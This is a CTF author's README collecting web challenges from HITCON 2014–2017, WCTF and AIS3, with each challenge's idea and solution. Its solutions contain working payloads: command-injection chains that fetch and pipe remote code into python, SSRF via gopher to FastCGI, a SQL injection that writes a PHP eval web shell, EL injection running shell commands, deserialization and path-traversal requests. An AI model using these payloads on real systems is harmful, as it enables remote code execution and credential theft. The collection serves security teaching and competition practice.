My CTF Web Challenges

Hi, I am Orange. This is the repo of CTF challenges I made. It contains challenge's source code, writeup and some idea explanation.

I am a CTFer and Bug Bounty Hunter, loving web hacking and penetration testing. So you will see these challs are all about web. If you have any question about these challs, you can find me in following ways

• orange@chroot.org
• blog.orange.tw

Hope you like it :)

P.s. BTW, the series of Babyfirst are my favorite in all of these challenges. There are open questions to all and there are lots of creative solutions. If you don't have time to see all, please look the them at least!

• Babyfirst
• Babyfirst Revenge
• Babyfirst Revenge v2

Table of Content

• HITCON 2017 Quals

  • BabyFirst Revenge
  • BabyFirst Revenge v2
  • SSRFme?
  • SQL so Hard
  • Baby^H Master PHP 2017

• HITCON 2016 Quals

  • %%%
  • Leaking
  • BabyTrick
  • Angry Boy
  • Angry Seam

• HITCON 2015 Quals

  • Babyfirst
  • nanana
  • Giraffe's Coffee
  • lalala
  • Use-After-FLEE

• HITCON 2014 Quals

  • PUSHIN CAT
  • PY4H4SHER
  • LEENODE

• WCTF 2016

  • BlackBox

• AIS3 Final 2015 Final

  • SQLPWN

BabyFirst Revenge

Difficulty: ★☆
Sovled: 95 / 1541
Tag: WhiteBox, PHP, Command Injection

Idea

• Command Injection, but only in 5 bytes

Source Code

• index.php

Solution

# generate `ls -t>g` to file "_"http://host/?cmd=>ls\http://host/?cmd=ls>_http://host/?cmd=>\ \http://host/?cmd=>-t\http://host/?cmd=>\>ghttp://host/?cmd=ls>>_# generate `curl orange.tw|python` to file "g"http://host/?cmd=>onhttp://host/?cmd=>th\http://host/?cmd=>py\http://host/?cmd=>\|\http://host/?cmd=>tw\http://host/?cmd=>e.\http://host/?cmd=>ng\http://host/?cmd=>ra\http://host/?cmd=>o\http://host/?cmd=>\ \http://host/?cmd=>rl\http://host/?cmd=>cu\http://host/?cmd=sh _# got shellhttp://host/?cmd=sh g

You can check the exploit.py for the detail! And there are also lots of creative solutions, you can check the write ups below.

Write Ups

• HITCON CTF 2017-BabyFirst Revenge-writeup

BabyFirst Revenge v2

Difficulty: ★★★★
Sovled: 8 / 1541
Tag: WhiteBox, PHP, Command Injection

Idea

• Command Injection, but only in 4 bytes

Source Code

• index.php

Solution

1. generate g> ht- sl to file v
2. reverse file v to file x
3. generate curl orange.tw|python;
4. execute x, ls -th >g
5. execute g

You can check exploit.py for the detail!

Write Ups

• script.py from @bennofs

SSRFme?

Difficulty: ★★☆
Sovled: 20 / 1541
Tag: WhiteBox, Perl, PATH Pollution

Idea

• CVE-2016-1238 (But the latest version of Ubuntu 17.04 in AWS is still vulnerable)
• Perl lookup current directory in module importing
• Perl module URI/lib/URI.pm#L136 will eval if there is a unknown scheme

Source Code

• index.php

$ sudo apt install libwww-perl

Solution

# write evil URI module to current directory$ curl http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl# eval evil module `orange`$ curl http://host/?filename=xxx&url=orange://orange.tw

Write Ups

TBD

SQL so Hard

Difficulty: ★★★
Sovled: 10 / 1541
Tag: WhiteBox, MySQL, PostgreSQL,SQL Injection, Code Injection

Idea

• MySQL max_allowed_packet dropped large size SQL sentence
• Node-Postgres - code execution vulnerability
• Exploit the RCE in SQL UPDATE syntax

Source Code

• app.js

Solution

• exploit.py

Write Ups

TBD

Baby^H Master PHP 2017

Difficulty: ★★★★☆
Sovled: 0 / 1541
Tag: WhiteBox, PHP, Serialization,Apache Prefock

Idea

• PHP do the de-serialization on PHAR parsing
• PHP assigned a predictable function name \x00lambda_%d to an anonymous function
• Break shared VARIABLE state in Apache Pre-fork mode

Source Code

• index.php

Solution

# get a cookie$ curl http://host/ --cookie-jar cookie# download .phar file from http://orange.tw/avatar.gif$ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'# force apache to fork new process$ python fork.py &# get flag$ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"

• avatar.gif
• fork.py

Write Ups

No one solve it :(

papapa

Difficulty: ★
Sovled: 71 / 1024
Tag: BlackBox, SSL, Pentesting

Idea

• Leak the internal hostname from SSL certificate

Source Code

• here

Solution

$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternativer Name"...depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = orange@chroot.org...# get flag$ curl -k  -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/

Write Ups

• HITCON 2016
• HITCON CTF 2016: %%% (Web) Write-up
• [HITCON 2016] [WEB 100 - %%%] WRITE UP
• hitcon2016 web writeup

Leaking

Difficulty: ★★
Sovled: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS

Idea

• Break JavaScript Sandbox
• Use NodeJS Buffer(int) to steal uninitialized memory
• Node.js Buffer knows everything

Source Code

• here

Solution

$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;

Write Ups

• Hello HitCon 2016 CTF
• HITCON 2016 web 总结
• hitcon2016 web writeup

BabyTrick

Difficulty: ★★★
Sovled: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize

Idea

• Create an Unexpected Object and Don't Invoke __wakeup() in Deserialization
• SugarCRM v6.5.23 PHP反序列化對象注入漏洞
• MySQL UTF-8 collation - SELECT 'Ä'='a' is True

Source Code

• here

Solution

# get passwordcurl http://1.2.3.4/?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}# get flagcurl http://1.2.3.4/?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}

Write Ups

• Hitcon 2016 – Baby Trick
• Hello HitCon 2016 CTF
• hitcon2016 web writeup

Angry Boy

Difficulty: ★★☆
Sovled: 43 / 1024
Tag: GrayBox, Java

Idea

• new String(new byte[] {1, -1, 1, -1}) will output 01EFBFBD01EFBFBD, not01FF01FF
• When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions

Source Code

• here

Solution

• exploit.py
• decrpt.py

Write Ups

• Angry Boy - Web 300 Problem

Angry Seam

Difficulty: ★★★★
Sovled: 4 / 1024
Tag: GrayBox, Java, Seam Framework,CSS RPO, EL Injection, Java Deserialization

Idea

• CSS Relative Path Overwrite
• Built-in redirection parameter actionOutcome
• RPO Gadgets
• CVE-2010-1871: JBoss Seam Framework remote code execution

Source Code

• here

Solution

P.s. I made this challenge because once when I try to review the code of Seam Framework, I found some 0-days and I think it must have more. So I throw out the brick to attract a jade. And the result is more than I expected :P

Intended solution

• Register an account

  username: `AAAAAA`    password: `AAAAAA`  realname: `{/*';*/}%0a@import'http://orange.tw/?`  

• Report URL

  http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom>e=/profile.seam?username%3dAAAAAA

Unintended solution

• Register an account
• Update description to
• Login and access

/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}

GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1host: 1.2.3.4cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}ccc: ls -alh...

Unintended solution

• CVE-2013-2165 Java deserialization vulnerability

Unintended solution

• SESSION manipulation... seam SUCKS

Write Ups

• Web500 Hitconctf 2016 and exploit CVE-2013-2165
• Angry Seam (500 pts)

Babyfirst

Sovled: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection

Idea

• Use NewLine to bypass regular expression check
• Command injection only with alphanumeric characters

Source Code

• here

<?php    highlight_file(__FILE__);    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];    if ( !file_exists($dir) )        mkdir($dir);    chdir($dir);    $args = $_GET['args'];    for ( $i=0; $i<count($args); $i++ ){        if ( !preg_match('/^\w+$/', $args[$i]) )            exit();    }    exec("/bin/orange " . implode(" ", $args));?>

Solution

http://localhost/?args[0]=x%0a&args[1]=mkdir&args[2]=orange%0a&args[3]=cd&args[4]=orange%0a&args[5]=wget&args[6]=846465263%0ahttp://localhost/?args[0]=x%0a&args[1]=tar&args[2]=cvf&args[3]=aa&args[4]=orange%0a&args[5]=php&args[6]=aa

And there are also lots of creative solutions, you can check the write ups below.

Write Ups

• babyfirst (web 100)
• HITCON CTF 2015 Web 100 Web 300 Writeup
• HITCON 2015 Quals: Babyexploit
• Babyfirst (web, 100p, ?? solves)

nanana

Difficulty: ★★★
Sovled: 18 / 969
Tag: GrayBox, C, PWN

Idea

• Pwn without library
• Format String without output
• Bypass Stack Guard by using overflow ARGV[1]

Source Code

• here

Solution

• exploit.py

Write Ups

• nanana (pwn, web 200)
• HITCON 2015 Quals: Nanana
• Pwning (sometimes) with style - Dragons’ notes on CTFs

Giraffe's Coffee

Difficulty: ★★★☆
Sovled: 16 / 969
Tag: WhiteBox, PHP

Idea

• Break PHP PRNG
• Break shared PRNG STATE in Apache Prefork mode

Source Code

• here

Solution

TBD

Write Ups

• HITCON CTF 2015 Web 100 Web 300 Writeup
• Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)
• HITCON 2015 WEB 300

lalala

Difficulty: ★★★☆
Sovled: 2 / 969
Tag: BlackBox, PHP, SSRF

Idea

• Bypass SSRF restrictiton with 302 redirect
• Exploit FASTCGI protocol by using GOPHER

Source Code

• here

Solution

<?phpheader( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );

Write Ups

• HITCON CTF 2015 Web 100 Web 300 Writeup
• Hitcon 2015 lalala web400 task

Use-After-FLEE

Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN

Idea

• Bypass open_basedir
• Bypass disable_functions
• PHP use-after-free exploit writing
• Bypass full protection (DEP / ASLR / PIE / FULL RELRO)
• Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList

Source Code

• here

Solution

TBD

Write Ups

• Use-After-FLEE (pwn, web 500)

PUSHIN CAT

Solved: 8 / 1020
Difficulty: ★★
Platform: BlackBox, PHP, H2, SQL Injection

Idea

• SQL Injection on H2 Database
• Execute Code by using H2 SQL Injection

Source Code

• here

Solution

TBD

Write Ups

• HITCON CTF 2014: PUSHIN CAT
• HITCON CTF 2014 - PUSHIN CAT (H2 DB Insert SQL Injection)
• HITCON CTF 2014

PY4H4SHER

Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision,HPP

Idea

• Python CGI HTTP Pollution
• MySQL old_password hash collisions
• PBKDF2+HMAC hash collisions explained

Source Code

• here

Solution

TBD  

Write Ups

• HITCON CTF 2014: PY4H4SHER
• HITCON CTF 2014: PY4H4SHER WRITEUP
• py4h4sher_solution.py
• HITCON CTF 2014

LEENODE

Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache

Idea

• Multilayered architecture vulnerability
• Double Encoding

Source Code

• here

Solution

# get password$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm# get flag$ curl http://1.2.3.4/admin/thefl4g.txt 

Write Ups

• HITCON CTF 2014: LEENODE
• (web) LEENODE [250]
• CTF/Writeup/HITCON2014/LEENODE

BlackBox

Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF

Idea

• Multilayered architecture vulnerability
• Default and up to date mod_jk leads to directory travesal
• Bypass WAF by incorrect usage of BASE64 and URLENCODE
• SQL Injection on H2 Database
• Execute Code by using H2 SQL Injection

Source Code

• here

Solution

• Get source code

  http://1.2.3.4/login/..;/

• Review code and find a way to bypass WAF

  $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--"$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"

• Write shell

  $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--"$ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'

Write Ups

TBD

SQLPWN

Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection,LFI, Race Condition

Idea

• One-byte off SQL Injection
• Race Condition
• Local file inclusion with PHP session

Source Code

• here

Solution

• Run exploit.py to win race condition

• Login and SQL Injection

  $ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\&note=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'

• Local file inclusion with session

  $ curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220

Write Ups

• AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)
• AIS3 CTF Final Web1 & Web2